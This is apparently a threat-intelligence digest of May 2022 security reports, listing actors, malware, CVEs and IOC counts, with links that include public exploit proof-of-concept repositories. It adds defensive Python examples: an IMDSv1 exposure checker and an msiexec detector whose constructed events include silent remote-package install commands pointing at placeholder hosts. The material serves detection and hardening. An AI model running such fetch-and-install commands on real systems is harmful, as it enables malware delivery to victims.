#ParsedReport
04-05-2022
Old Services, New Tricks: Cloud Metadata Abuse by UNC2903
https://www.mandiant.com/resources/cloud-metadata-abuse-unc2903
Actors/Campaigns:
Unc2903 (tags: scan, rat, malware, proxy, vpn)
Industry:
Financial
CVEs:
CVE-2021-21311 [Vulners]
Vulners: Score: 6.4, CVSS: 4.5,
Vulners: Exploitation: Unknown
X-Force: Risk: 5.3
X-Force: Patch: Official fix
Soft:
- adminer (<4.7.9)
- debian debian linux (9.0)
CVE-2019-0211 [Vulners]
Vulners: Score: 7.2, CVSS: 3.9,
Vulners: Exploitation: Unknown
X-Force: Risk: 8.2
X-Force: Patch: Official fix
Soft:
- apache http server (le2.4.38)
- fedoraproject fedora (29, 30)
- canonical ubuntu linux (16.04, 18.04, 18.10, 14.04)
- debian debian linux (9.0)
- opensuse leap (42.3, 15.0)
have more...
TTPs:
Tactics: 5
Technics: 6
IOCs:
IP: 5
Url: 3
File: 3
Coin: 3
Hash: 1
Links:
https://github.com/duo-labs/cloudmapper
https://github.com/latacora/remediate-AWS-IMDSv1
https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
https://github.com/salesforce/metabadger
https://github.com/prowler-cloud/prowler/blob/master/checks/check_extra786
Google Cloud Blog
Old Services, New Tricks: Cloud Metadata Abuse by UNC2903 | Google Cloud Blog
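The UNC2903 report above is about reaching the EC2 instance metadata service from a compromised web application; IMDSv1 answers plain GET requests with no session token, which is what makes an SSRF or a shell on the box enough to pull role credentials. The linked remediate-AWS-IMDSv1 repository and the prowler check address the same setting. As an added example, not code from Mandiant or from either linked project, here is a check over the JSON shape returned by `aws ec2 describe-instances` that flags instances still accepting IMDSv1 and prints the commands to enforce IMDSv2. The sample instances are constructed, and reporting a hop limit above 1 as a secondary issue is this example's own choice.

```python
"""Flag EC2 instances that still answer IMDSv1 (no session token required).

Added example, not from the Mandiant report or the linked tools. Input is
the document returned by `aws ec2 describe-instances`; the sample below is
constructed and the instance IDs are invented.
"""
import json

# Constructed sample in the shape of `aws ec2 describe-instances` output.
SAMPLE_DESCRIBE_INSTANCES = json.dumps({
    "Reservations": [
        {"Instances": [
            {"InstanceId": "i-0aaa111", "State": {"Name": "running"},
             "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                                 "HttpPutResponseHopLimit": 2}},
            {"InstanceId": "i-0bbb222", "State": {"Name": "running"},
             "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                                 "HttpPutResponseHopLimit": 1}},
            {"InstanceId": "i-0ccc333", "State": {"Name": "stopped"},
             "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                                 "HttpPutResponseHopLimit": 1}},
        ]},
        {"Instances": [
            {"InstanceId": "i-0ddd444", "State": {"Name": "running"},
             "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                                 "HttpPutResponseHopLimit": 3}},
        ]},
    ]
})


def imdsv1_exposed(describe_output: str) -> list:
    """Return one finding per instance whose metadata endpoint is enabled and
    whose HttpTokens setting is not 'required' (IMDSv1 still answers).

    HttpPutResponseHopLimit is the TTL on the reply to the IMDSv2 token PUT;
    at 1 the token cannot cross a network hop (e.g. a container on a bridge
    network). A higher value is recorded as a secondary issue, which is this
    example's own heuristic rather than a rule from the report.
    """
    findings = []
    for reservation in json.loads(describe_output)["Reservations"]:
        for inst in reservation["Instances"]:
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") != "enabled":
                continue  # IMDS switched off: nothing reachable
            issues = []
            if opts.get("HttpTokens") != "required":
                issues.append("imdsv1_allowed")
            if opts.get("HttpPutResponseHopLimit", 1) > 1:
                issues.append("hop_limit_gt_1")
            if issues:
                findings.append({"InstanceId": inst["InstanceId"], "issues": issues})
    return findings


def remediation_commands(findings: list) -> list:
    """aws-cli commands that enforce IMDSv2 on each flagged instance."""
    return [
        "aws ec2 modify-instance-metadata-options --instance-id "
        f"{f['InstanceId']} --http-tokens required --http-endpoint enabled "
        "--http-put-response-hop-limit 1"
        for f in findings
    ]


if __name__ == "__main__":
    hits = imdsv1_exposed(SAMPLE_DESCRIBE_INSTANCES)
    for hit in hits:
        print(hit["InstanceId"], ",".join(hit["issues"]))
    for cmd in remediation_commands(hits):
        print(cmd)
```

Feed it real output with `aws ec2 describe-instances --output json` and review the hop-limit hits separately: workloads that legitimately run in bridge-mode containers need a hop limit of 2, and forcing 1 there breaks their credential fetch rather than hardening it.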
#ParsedReport
04-05-2022
Minerva Labs Blog
https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs
Threats:
Blu_stealer (tags: phishing, stealer, malware, cryptomining, ransomware)
Spyex
Hallowing_technique
Exodus
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 4
Path: 4
Registry: 2
Hash: 4
#ParsedReport
04-05-2022
Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation
https://www.cybereason.com/blog/operation-cuckoobees-cybereason-uncovers-massive-chinese-intellectual-property-theft-operation
Actors/Campaigns:
Axiom (tags: malware)
Threats:
Deploylog
Spyder
Privatelog
Winnkit
Stashlog
Eternal_petya
Industry:
Government, E-commerce
Geo:
America, Asia, Chinese, China
Cybereason
Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation
Cybereason recently uncovered an attack assessed to be the work of Chinese APT Winnti that operated undetected, siphoning intellectual property and sensitive data - the two companion reports examine the tactics and techniques of the overall campaign as well as more…
#ParsedReport
05-05-2022
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service
https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html
Threats:
Netdooka (tags: botnet, backdoor, trojan, malware, dropper, rat, ddos)
Privateloader (tags: botnet, backdoor, trojan, malware, dropper, rat, ddos)
Smokeloader_backdoor (tags: malware)
Redline_stealer (tags: malware)
Anubis (tags: malware)
Viper_rat
Trojan.win32.stop.el
Trojan.win64.protdrive.a
Trojan.win32.vindor.a
IOCs:
File: 4
Path: 3
IP: 3
Hash: 38
Url: 5
Links:
https://github.com/microsoft/Windows-driver-samples/tree/master/general/obcallback
https://github.com/SweetIceLolly/Prevent_File_Deletion
Trend Micro
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service
This report focuses on the components and infection chain of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver.
#ParsedReport
05-05-2022
Top Cyber Threats to the Telecom Industry
https://www.intezer.com/blog/incident-response/cyber-threats-telecom-industry
Actors/Campaigns:
Lightbasin
Lapsus
Evil_corp
Threats:
Macaw
Cobalt_strike
Beacon
Vermilion
Industry:
Telco, Iot, Aerospace, Media
Geo:
Russian, Iranian, Polish
Intezer
Top Cyber Threats to the Telecom Industry
Learn about top threats to the telecom industry and how teams are using automation to keep up with alert triage, incident response, and threat hunting.
Somehow I missed the update to the list of groups
https://twitter.com/Cyberknow20/status/1520746724763250688
Twitter
CyberKnow
📢📢Update 13. 1 MAY. #cybertracker 📢📢 74 Groups: 46 Pro-Ukraine 26 Pro-Russia 2 Unknown(UNK) 7 removed. Usual caveats apply. Tips/Info welcome. #cybersecurity #ThreatIntelligence #Russiaukrainewar #CyberAttack #infosec #UkraineRussiaWar cyberknow.medium.com/update…
#ParsedReport
05-05-2022
Mustang Panda deploys a new wave of malware targeting Europe
http://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html
Actors/Campaigns:
Red_delta (tags: trojan, rat, phishing, malware)
Threats:
Meterpreter_tool (tags: rat, malware)
Plugx_rat (tags: rat, malware)
Cobalt_strike
Bespoke (tags: rat, malware)
Lolbas_technique
Industry:
Telco, Government, Ngo
Geo:
Russia, Mongolia, Afghan, Japanese, Ukraine, Asia, Tibet, Japan, Taiwan, Ukrainian, Belarus, Myanmar, Greece, Indian, American, Asian
IOCs:
File: 14
IP: 28
Path: 5
Registry: 1
Hash: 114
Domain: 1
Url: 44
Cisco Talos Blog
Mustang Panda deploys a new wave of malware targeting Europe
* In February 2022, corresponding roughly with the start of the Russian Invasion of Ukraine, Cisco Talos began observing the China-based threat actor Mustang Panda conducting phishing campaigns against European entities, including Russian organizations. Some…
#ParsedReport
05-05-2022
"Excuse me, how will the conflict between Russia and Ukraine affect the situation on the peninsula?" Analysis of the recent targeted attack activities of APT organization Kimsuky
https://blog-nsfocus-net.translate.goog/apt-kimsuky-3/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=ru&_x_tr_pto=wapp
Actors/Campaigns:
Kimsuky (tags: trojan, phishing, malware)
Geo:
Ukraine, Korea, Russia
IOCs:
File: 27
Url: 7
Path: 1
#ParsedReport
05-05-2022
North Korea's Lazarus: their initial access trade-craft using social media and social engineering
https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering
Actors/Campaigns:
Lazarus (tags: malware, vpn, phishing)
Threats:
Lcpdot (tags: vpn, malware)
Industry:
Government
Geo:
Koreas
TTPs:
Tactics: 1
Technics: 4
IOCs:
Domain: 6
Path: 2
File: 3
IP: 1
Hash: 6
#ParsedReport
05-05-2022
Nigerian Tesla: 419 scammer gone malware distributor unmasked
https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked
Threats:
Agent_tesla (tags: phishing, ransomware, malware, spam, stealer, scam, dns, vpn)
Avemaria_rat
Netwire_rat
4shared
Cassandraprotector_tool
Geo:
Nigeria, Nigerian, Ukraine, Ukrainian
IOCs:
File: 2
Email: 25
Domain: 1
Malwarebytes Labs
Nigerian Tesla: 419 scammer gone malware distributor unmasked
Scamming, phishing and other data theft is all part of Nigeria Tesla's portfolio.
#ParsedReport
05-05-2022
Cybercrime loves company: Conti cooperated with other ransomware gangs
https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker
Threats:
Conti (tags: ransomware, malware)
Ryuk (tags: ransomware)
Maze (tags: ransomware)
Lockbit (tags: ransomware)
Ragnarlocker (tags: ransomware)
Emotet (tags: ransomware)
Trickbot
Geo:
Russian
Intel471
Cybercrime loves company: Conti cooperated with other ransomware gangs
Conti kept a close eye on other ransomware groups and borrowed some of their techniques and best practices for their own operations.
#ParsedReport
05-05-2022
Shells blooming in Spring
https://labs.k7computing.com/index.php/shells-blooming-in-spring
Threats:
Spring4shell (tags: rat)
Log4shell_vuln (tags: rat)
Mirai
Emotet
CVEs:
CVE-2022-22965 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring framework (<5.2.20, <5.3.18)
- cisco cx cloud agent (<2.1.0)
- oracle communications cloud native core automated test suite (1.9.0, 22.1.0)
- oracle communications cloud native core console (1.9.0, 22.1.0)
- oracle communications cloud native core network exposure function (22.1.0)
have more...
CVE-2022-22695 [Vulners]
CVE-2022-22963 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring cloud function (le3.1.6, le3.2.2)
IOCs:
File: 8
Hash: 1
Links:
https://github.com/dinosn/CVE-2022-22963
https://github.com/lunasec-io/Spring4Shell-POC
https://github.com/reznok/Spring4Shell-POC
K7 Labs
Shells blooming in Spring - K7 Labs
Yet another vulnerability has been reported in the Java platform, this time in the popular Java Spring framework, just a […]
#ParsedReport
06-05-2022
Mobile subscription Trojans and their little tricks
https://securelist.com/mobile-subscription-trojans-and-their-tricks/106412
Threats:
Vesub (tags: trojan, malware)
Triada
Joker (tags: trojan)
Industry:
E-commerce, Financial
Geo:
Russia, Arabia, Russian, Indonesia, Austria, China, Brazil, Saudi, Switzerland, Mexico, Turkey, Egypt, Poland, India, Germany, Africa, Thailand, Belarus, Algeria, Ukraine, Arab, Malaysia, Oman
IOCs:
File: 4
Hash: 37
Securelist
The Trojan subscribers Joker, MobOk, Vesub and GriftHorse
Kaspersky analysis of mobile subscription Trojans Joker (Jocker), MobOk, Vesub and GriftHorse and their activity: technical description and statistics.
#ParsedReport
06-05-2022
macOS Malware Is More Reality Than Myth: Popular Threats and Challenges in Analysis
https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities
Threats:
Applescript
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 2
Hash: 9
crowdstrike.com
How CrowdStrike Analyzes macOS Malware to Optimize Automated Detection
Learn how CrowdStrike macOS malware research is turned into expert input and knowledge that’s used to optimize the automated detection capabilities of the Falcon platform.
#ParsedReport
06-05-2022
Raspberry Robin gets the worm early
https://redcanary.com/blog/raspberry-robin
Threats:
Raspberry_robin (tags: rat, malware)
TTPs:
Tactics: 5
Technics: 5
IOCs:
File: 11
Path: 6
Domain: 2
Hash: 2
Registry: 1
Url: 2
Red Canary
Raspberry Robin gets the worm early
Raspberry Robin is a worm spread by external drives that leverages Windows Installer to download a malicious DLL.
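Red Canary's one-line summary above says the worm abuses Windows Installer to fetch a malicious DLL. As an added example, not code from Red Canary, here is a detection over process-creation events that flags `msiexec.exe` being told to install a package from an http(s) URL, and records whether the install was silent and what launched it. The events, hostnames and paths are constructed, and treating "msiexec with a URL as its package source" as the observable is this example's assumption about the technique, not a detail taken from the post.

```python
"""Detect msiexec.exe installing a package straight from a URL.

Added example, not from the Red Canary post. Events are constructed in the
shape of Sysmon process-creation records, trimmed to the fields the rule
reads; every hostname, path and user below is invented.
"""
import re
import shlex
from typing import Optional

# Constructed process-creation events (not IOCs from the report).
EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec /q /i "http://example-lure.invalid:8080/pkg.msi"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\dev\Downloads\tool.msi /qn",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r"msiexec -Q -I https://cdn.example.invalid/update.msi",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Git\cmd\git.exe",
     "CommandLine": r"git clone https://github.example.invalid/repo.git",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def msiexec_remote_install(event: dict) -> Optional[dict]:
    """Return a finding if msiexec.exe is given an http(s) URL as its package.

    msiexec accepts both '/' and '-' switches and ignores case, so switches
    are normalised before checking for a quiet flag (/q, /qn, -Q ...). Only
    the Image path decides that this is msiexec; the argv[0] spelling is not
    trusted because it can be renamed or quoted arbitrarily.
    """
    if not event["Image"].lower().endswith("\\msiexec.exe"):
        return None
    try:
        # posix=False keeps Windows backslashes and honours "quoted" arguments
        argv = shlex.split(event["CommandLine"], posix=False)
    except ValueError:  # unbalanced quote: fall back to a plain split
        argv = event["CommandLine"].split()
    args = [a.strip('"') for a in argv[1:]]
    url = next((a for a in args if URL_RE.match(a)), None)
    if url is None:
        return None
    switches = [a.lstrip("/-").lower() for a in args if a.startswith(("/", "-"))]
    return {
        "url": url,
        "quiet": any(s.startswith("q") for s in switches),
        "parent": event["ParentImage"],
    }


def scan(events: list) -> list:
    """Run the rule over a batch of events and collect the findings."""
    findings = []
    for event in events:
        finding = msiexec_remote_install(event)
        if finding:
            findings.append({"image": event["Image"], **finding})
    return findings


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(f"{hit['image']} <- {hit['parent']}: {hit['url']} quiet={hit['quiet']}")
```

Local MSI installs (the second event) are left alone on purpose: the signal is the remote package source, and a silent install from a URL with a cmd.exe parent is the combination to escalate first rather than every msiexec launch.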
#ParsedReport
06-05-2022
Bad Rabbit Ransomware
https://www.varonis.com/blog/bad-rabbit-ransomware
Actors/Campaigns:
Sandworm
Threats:
Watering_hole_technique
Imminentmonitor_rat
Mimikatz
Mamba
Stop
Industry:
Financial
Geo:
Russia, Ukraines, Russian, Japan
CVEs:
CVE-2017-0145 [Vulners]
Vulners: Score: 9.3, CVSS: 8.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- microsoft server message block (1.0)
IOCs:
Domain: 1
IP: 1
Url: 26
Hash: 6
Links:
https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py
Varonis
Bad Rabbit Ransomware
Bad Rabbit is a ransomware strain that spread via hacked websites, infected systems via a fake Adobe installer and held encrypted files for Bitcoin.
#ParsedReport
06-05-2022
Emotet: New Delivery Mechanism to Bypass VBA Protection
https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection
Threats:
Emotet (tags: botnet, rat, trojan, malware, phishing, fraud)
Trickbot
Spring4shell
Industry:
Financial
IOCs:
File: 9
Hash: 143
Url: 12
IP: 67
YARA: Found
Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Emotet/IOCs/2022-05-06
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/blob/main/Emotet/IOCs/script/decrypt_payload.py
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/blob/main/Emotet/IOCs/script/decrypt_c2.py
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Emotet
Netskope
Emotet: New Delivery Mechanism to Bypass VBA Protection
Summary Emotet started as a banking trojan in 2014 and later evolved to what has been considered the world's most dangerous malware by Europol, often used
PhD2022_IoCs_Scoring_v2.pdf
880.5 KB
Today at PhDays I gave a talk on how indicator scoring works at RST Cloud.
Here's the deck, by the way :)
#ParsedReport
19-05-2022
Space Pirates: Explore the tools and connections of a new hacker group
https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections
Actors/Campaigns:
Spacepirates (tags: dropper, malware, dns, backdoor, rat, phishing, proxy)
Axiom
Emissary_panda
Ta428
Red_delta
Redfoxtrot
Stealthytrident
Nightscout
Threats:
Zupdax (tags: rat)
Former_first_rat
Climax_loader
Rtlshare
Plugx_rat (tags: backdoor, dropper)
9002 (tags: rat)
Deed_rat (tags: dns, rat)
Pcshare
Poison_ivy
Shadowpad
Revbshell
Tmanger
Albaniiutas_rat
Bluetraveller_rat
Hyperbro
Smokeloader_backdoor
Reactorbot
Gh0st_rat
Chromepass_tool
Industry:
Aerospace, Financial, Government, Energy
Geo:
Asian, Chinese, Russia, Mongolia, Georgia, Japanese
CVEs:
CVE-2017-0213 [Vulners]
Vulners: Score: 1.9, CVSS: 6.4,
Vulners: Exploitation: True
X-Force: Risk: 7
X-Force: Patch: Official fix
Soft:
- microsoft windows 10 (1607, -, 1511, 1703)
- microsoft windows rt 8.1 (*)
- microsoft windows server 2012 (-, r2)
- microsoft windows server 2008 (r2, *)
- microsoft windows 8.1 (*)
have more...
TTPs:
Tactics: 10
Technics: 54
IOCs:
File: 51
Path: 20
Email: 1
IP: 23
Hash: 156
Registry: 8
Links:
https://github.com/obfuscator-llvm/obfuscator/wiki/Control-Flow-Flattening
https://github.com/bitsadmin/ReVBShell
https://github.com/vzex/dog-tunnel
https://github.com/LiveMirror/pcshare
ptsecurity.com
PT ESC Threat Intelligence Blog
In this blog you can find information about current attacks by hacker groups around the world, analysis of their tools, information about incidents, group TTPs, indicators of compromise and the names of the detections in our products
#ParsedReport
19-05-2022
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC Part I
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
Actors/Campaigns:
Keksec (tags: malware, phishing)
Threats:
Avemaria_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Sbit_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Pandorahvnc (tags: spam, botnet, malware, phishing, rat, ddos, proxy, ransomware)
Emotet (tags: malware, phishing)
Enemybot (tags: malware, phishing)
Vba/agent.ddon!tr (tags: malware)
Industry:
Financial
IOCs:
File: 17
Url: 5
Path: 2
Hash: 3
Fortinet Blog
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I
FortiGuard Labs discovered a phishing campaign delivering fileless malware to steal sensitive information from a victim’s device. Read our analysis to find out more about how the campaign executes …
#ParsedReport
19-05-2022
The BlackByte ransomware group is striking users all over the globe
http://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html
Threats:
Blackbyte (tags: vpn, phishing, malware, ransomware)
Lolbin
Anydesk_tool
Proxyshell_vuln
Psexec_tool
Industry:
Financial
Geo:
Mexico, Netherlands, America, China, Colombia, Vietnam
IOCs:
File: 5
Path: 1
Links:
https://github.com/Neo23x0/Raccine
Cisco Talos Blog
The BlackByte ransomware group is striking users all over the globe
News summary
* Cisco Talos has been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.
* The FBI released a joint cybersecurity advisory…